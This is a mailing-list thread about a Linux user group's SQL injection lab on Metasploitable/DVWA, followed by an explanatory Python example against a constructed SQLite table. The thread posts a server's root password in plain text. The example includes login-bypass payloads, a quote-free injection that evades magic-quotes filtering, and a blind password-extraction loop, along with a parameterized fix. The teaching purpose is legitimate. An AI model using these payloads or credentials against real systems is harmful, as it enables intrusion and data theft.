[Plug-security] SQL Injection Toyz [Flag] (Still Up/Available)

Lisa Kachold lisakachold at obnosis.com
Sat Jun 15 20:02:07 MST 2013


Hi!

I run a VMware ESXi server at OneNeck http://12.159.65.85

It requires that you install the vSphere client to manage it (and I can
give you a quick training session if you are interested).

If you point your browser to the IP above and download the Windows vSphere
client, you can access it via (what was that password)?
Oh, wait, it's "root" "h4ckth3b0x!"       -  WARNING - Do nothing unless
you are certain of what you are doing - our mantra is first do no harm.

From access to it you can restart the virtual hosts (Metasploitable) or
open a console and determine what happened --- (or I can [did]).

You can just ask me about it anytime you find it locked up (like this) and
I will fix it.

Whatever you guys were doing, you managed to FUZZ the kernel --> so the
last thing I see after opening up a console (on the tab in vSphere) to
Metasploitable is

kmem_cache_alloc+0x46/0xc0 SS:ESP kernel panic Fatal exception in interrupt

So, I rebooted it (right click on Metasploitable Tab).

You can also set up your own systems with this access for the next Hackfest if
you want.

On Sat, Jun 15, 2013 at 7:13 PM, Jorge Rios <jorge.rios.2981 at gmail.com> wrote:

> Hi Lisa,
>
> I've been playing with the system for the last few days and it seems to be
> down today.
>
> - Jorge
>
>
> On Thu, May 23, 2013 at 10:00 PM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>
>> Well, there are a few things to attack on Metasploitable.
>>
>> There's SSH of course - but you got help there?
>> There are PHP holes - run Metasploitable or Armitage against it?
>> There's TikiWiki there too - to declare your flags.
>> Damn Vulnerable Linux is the injection example.
>>
>> Here are some tutorials for use with Metasploitable 2 and BackTrack 5:
>>
>> http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html
>> https://community.rapid7.com/docs/DOC-1875
>>
>>
>> On Thu, May 23, 2013 at 9:34 PM, Sam Kreimeyer <skreimey at gmail.com> wrote:
>>
>>> Thanks for the help! The SSH login was pretty useful. I was able to look
>>> at the PHP source code for the SQL injection tab and see that magic quotes
>>> were turned on (which made for very difficult injecting!). I saw that the
>>> security cookie was defaulted to high, so I just changed that with Firebug.
>>> That made things much easier!
>>>
>>> Now is there a particular flag file I should be looking for, or is this
>>> more of a sandbox to play with?
>>>
>>>
>>> On Wed, May 22, 2013 at 4:35 PM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>>>
>>>> Here's the SQL Injection links:
>>>>
>>>> http://12.159.65.86/dvwa/index.php
>>>>
>>>>
>>>> On Wed, May 22, 2013 at 12:37 PM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>>>>
>>>>> You can get in via msfadmin ssh.
>>>>>
>>>>> I rebooted it.
>>>>>
>>>>> It should answer now.
>>>>> We just needed to do this:
>>>>> http://colesec.inventedtheinternet.com/metasploitable-2-and-mutillidae/
>>>>>
>>>>>
>>>>> On Wed, May 22, 2013 at 11:17 AM, Lisa Kachold <
>>>>> lisakachold at obnosis.com> wrote:
>>>>>
>>>>>> Log in to the first page - the login is on the bottom of the screen
>>>>>> and restart the toy/tool.
>>>>>>
>>>>>>
>>>>>> On Wed, May 22, 2013 at 11:16 AM, Lisa Kachold <
>>>>>> lisakachold at obnosis.com> wrote:
>>>>>>
>>>>>>> Someone probably crashed the server.
>>>>>>>
>>>>>>> We can recreate it.
>>>>>>>
>>>>>>>
>>>>>>> On Tue, May 21, 2013 at 2:20 PM, Sam Kreimeyer <skreimey at gmail.com>wrote:
>>>>>>>
>>>>>>>> The error messages on the web server make it look like all the
>>>>>>>> tables have been dropped on Mutillidae. Was that the injection point we
>>>>>>>> were supposed to go for?
>>>>>>>>
>>>>>>>>
>>>>>>>> On Tue, May 14, 2013 at 3:17 PM, Lisa Kachold <
>>>>>>>> lisakachold at obnosis.com> wrote:
>>>>>>>>
>>>>>>>>> We are giving the PLUG Hackfesters additional time to take this
>>>>>>>>> flag, since SQL injection is one of those skills that really demands
>>>>>>>>> mastery (or a good deal of experience with SQL commands, such as is obtained
>>>>>>>>> via DevOps or Linux systems administration/engineering).
>>>>>>>>>
>>>>>>>>> The exploitable system is still up at http://12.159.65.86 - in the
>>>>>>>>> OneNeck DeVry rack. Thanks very much to OneNeck Hosting for
>>>>>>>>> providing this rack resource to the DeVry students and the Phoenix Open Source
>>>>>>>>> Community!
>>>>>>>>>
>>>>>>>>> There are a great number of SQL Injection tools available for your
>>>>>>>>> use:
>>>>>>>>>
>>>>>>>>> 0) https://code.google.com/p/mysqloit/
>>>>>>>>>
>>>>>>>>> 1) SQL Ninja:   If you are using SQL Ninja as packaged in BT5r3,
>>>>>>>>> it's configured for use against Microsoft MSSQL and doesn't work. Our SQL
>>>>>>>>> servers are not using a SA user - and a great number of the exploits in the
>>>>>>>>> wild will be using Oracle, db2, postgresql, or mysql.  You can bypass the
>>>>>>>>> (incorrectly preconfigured) version from BT5r3 (which, as a Pentesting
>>>>>>>>> distro, exists just to get you started, not to stop you when something
>>>>>>>>> doesn't work [or is broken by default because it's too powerful for the
>>>>>>>>> masses]) with http://sqlninja.sourceforge.net/  - be sure to
>>>>>>>>> follow the easy tutorial here:
>>>>>>>>> http://sqlninja.sourceforge.net/sqlninjademo.html
>>>>>>>>>
>>>>>>>>> 2) http://sqlmap.org/  (Note: you must point this to the correct
>>>>>>>>> URL where the example exploitable database is fed from a form, i.e. the one
>>>>>>>>> found after completing the login at
>>>>>>>>> http://12.159.65.86/dvwa/login.php - read the page, silly.)  I saw
>>>>>>>>> a few of you pointing to the wrong URL/path.  Some of that might be due to
>>>>>>>>> (again) the defaults in BT5r3.   Here are better instructions on how to use
>>>>>>>>> the sqlmap tool (from any Linux, Windows, or OS X Python installation):
>>>>>>>>> http://franx47.wordpress.com/2013/02/01/using-sqlmap-for-sql-injection/
>>>>>>>>> (These worked for me).
>>>>>>>>>
>>>>>>>>> 3) If you would like to attack MSSQL to delve into SQL injection
>>>>>>>>> (as David Demland's presentation touched on, to provide completeness on the
>>>>>>>>> subject of SQL injection, especially where the "sa" user is concerned), please
>>>>>>>>> see this test site:
>>>>>>>>>
>>>>>>>>> Here's a presentation that is specific to MySQL only for SQL
>>>>>>>>> injection:
>>>>>>>>> http://www.tizag.com/mysqlTutorial/mysql-php-sql-injection.php
>>>>>>>>> For anyone at greater than a basic level of SQL injection, the differences in
>>>>>>>>> MSSQL and MySQL (or other SQL servers) are trivial (just ensure you
>>>>>>>>> understand privileges for either the mysql user or the sa user, and other specifics
>>>>>>>>> for DB2 or Oracle, for instance).
>>>>>>>>>
>>>>>>>>> 4) Of course many purists advocate use of Burp Suite:
>>>>>>>>> http://portswigger.net/burp/ (which is available in BT5r3 {open a
>>>>>>>>> terminal window and type "locate burp"}).
>>>>>>>>>
>>>>>>>>> This is nothing like the fun that is had in [my] day-to-day Linux
>>>>>>>>> systems administration for MySQL/PostgreSQL/DB2 (for which we generally also
>>>>>>>>> act as a "DBA") or in holding key DevOps roles supporting large tanks of
>>>>>>>>> developers with ETL projects.
>>>>>>>>>
>>>>>>>>> An especially fun and powerful ETL "tool" (imagine the
>>>>>>>>> possibilities) is CloverETL:    http://www.cloveretl.com/
>>>>>>>>>
>>>>>>>>> Hackfest Mentorship DISCLAIMER:  We will happily assist you to
>>>>>>>>> learn or use any tool in order to complete the practical parts of the labs
>>>>>>>>> (actual encroachment).  We will not teach you "how to hack" or "how to get
>>>>>>>>> a flag" other than to refer you to the public lab we have available (in this
>>>>>>>>> case "Metasploitable") or ask you questions that will allow you to solve
>>>>>>>>> the tests.  Expect all of your questions to lead to more questions - we
>>>>>>>>> hope to teach you to USE THE SOURCE, Luke!  Google will work if you don't
>>>>>>>>> have any midi-chlorians in your blood.
>>>>>>>>>
>>>>>>>>> We especially love this "3 pronged attack"  Translated by use of
>>>>>>>>> Google:
>>>>>>>>> http://translate.google.com/translate?hl=en&sl=es&u=http://www.blogtecnico.net/bt5r3-tor-burp-suite-sqlmap/&prev=/search%3Fq%3Dburpsuite%2Bon%2Bbt5r3
>>>>>>>>>
>>>>>>>>> Okay, ready, let's hit the "Blind SQL Injection" button:
>>>>>>>>> http://itsecuritylab.eu/index.php/tag/sql-injection/
>>>>>>>>>
>>>>>>>>> We decided not to use our resources for this flag....
>>>>>>>>>
>>>>>>>>> So if you want a flag just to win a prize, this one's not for you.
>>>>>>>>> Come back next month when we do IPv6.
>>>>>>>>> --
>>>>>>>>>
>>>>>>>>> (503) 754-4452 Android
>>>>>>>>> (623) 239-3392 Skype
>>>>>>>>> (623) 688-3392 Google Voice
>>>>>>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>>>>>>> Chief Clown
>>>>>>>>> _______________________________________________
>>>>>>>>> Plug-security mailing list  -  Plug-security at lists.phxlinux.org
>>>>>>>>> To change settings or unsubscribe:
>>>>>>>>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>>>>>>>>


-- 

(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
it-clowns.com <http://it-clowns.com/d/>
Chief Clown
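
Two details in the thread above are worth seeing in code: Sam's observation that magic quotes made injecting into the DVWA login hard, and the "Blind SQL Injection" item in Lisa's tool list. The block below is an added example written for this page; it is not code from DVWA, Metasploitable, or anyone in the thread. It models DVWA's string-concatenated PHP query in Python against a constructed in-memory SQLite table (the users, ids and passwords are made up, and the plaintext password column is a simplification), shows the classic ' OR '1'='1 login bypass, shows a magic-quotes style filter stopping it, and then shows why that filter is no fix: an id used in a numeric context is interpolated without surrounding quotes, so a quote-free payload still goes straight into the query, and a boolean-based blind loop can pull a password out of the table one character at a time through it. The parameterized query is the real fix. The function names (login_concat, login_param, user_by_id, quote_escape, blind_extract_password) and the quote-doubling model of magic quotes are assumptions made here.

```python
import sqlite3

# Constructed sample data standing in for the DVWA/Mutillidae users table.
# Plaintext passwords are a simplification of DVWA's md5 column; the point
# here is how the query is built, not how the password is stored.
USERS = [(1, "admin", "password"), (2, "gordonb", "abc123")]


def setup_db():
    """Return an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def quote_escape(s):
    """Model of a magic_quotes-style input filter (assumption: PHP's
    addslashes backslash-escapes quotes for MySQL; SQLite escapes a single
    quote by doubling it, so the equivalent filter for this database doubles
    quotes). Either way a quote in the input can no longer close the literal."""
    return s.replace("'", "''")


def login_concat(conn, user, pw, escape=None):
    """Vulnerable login: the string-concatenated query a PHP page builds.
    escape=None is raw concatenation; escape=quote_escape models the
    magic-quotes filter being applied to both inputs first."""
    if escape is not None:
        user, pw = escape(user), escape(pw)
    sql = "SELECT user FROM users WHERE user = '%s' AND password = '%s'" % (user, pw)
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error is reported to the caller as a failed login


def login_param(conn, user, pw):
    """The fix: a parameterized query. Input is bound as data and can never
    become SQL syntax, so no quote escaping is needed at all."""
    row = conn.execute(
        "SELECT user FROM users WHERE user = ? AND password = ?", (user, pw)
    ).fetchone()
    return row is not None


def user_by_id(conn, id_param, escape=None):
    """Vulnerable lookup in a numeric context: the id is interpolated without
    surrounding quotes, so a filter that only escapes quotes has nothing to
    act on and a payload such as '9 OR 1=1' is spliced into the query as-is."""
    if escape is not None:
        id_param = escape(id_param)
    sql = "SELECT user FROM users WHERE user_id = %s" % id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def blind_extract_password(conn, target_id, escape=None, max_len=32):
    """Boolean-based blind extraction through user_by_id(). Each call asks one
    yes/no question: does the target row still come back when a condition on
    one character of its password is ANDed in? The payload uses char() instead
    of quoted literals, so it contains no quote characters and a magic-quotes
    style filter does not interfere at all."""
    expected = user_by_id(conn, str(target_id), escape)  # the "true" response
    if expected is None:
        return None
    recovered = ""
    for pos in range(1, max_len + 1):
        guessed = None
        for code in range(32, 127):  # printable ASCII
            payload = (
                "%d AND substr((SELECT password FROM users WHERE user_id = %d), %d, 1) = char(%d)"
                % (target_id, target_id, pos, code)
            )
            if user_by_id(conn, payload, escape) == expected:
                guessed = chr(code)
                break
        if guessed is None:  # substr() past the end matches nothing: done
            break
        recovered += guessed
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("raw concat, ' OR '1'='1 as password:", login_concat(db, "anyone", "' OR '1'='1"))
    print("same login with quote filter:", login_concat(db, "anyone", "' OR '1'='1", quote_escape))
    print("numeric context with quote filter, 9 OR 1=1:", user_by_id(db, "9 OR 1=1", quote_escape))
    print("blind extraction with quote filter on:", blind_extract_password(db, 1, quote_escape))
```

Running the file prints the four results. The blind loop spends at most 95 requests per character, which is the same boolean-based technique sqlmap automates (its --technique=B), and the quote-free payload is why "magic quotes are on" only tells you to look for a parameter that is not wrapped in quotes rather than to give up.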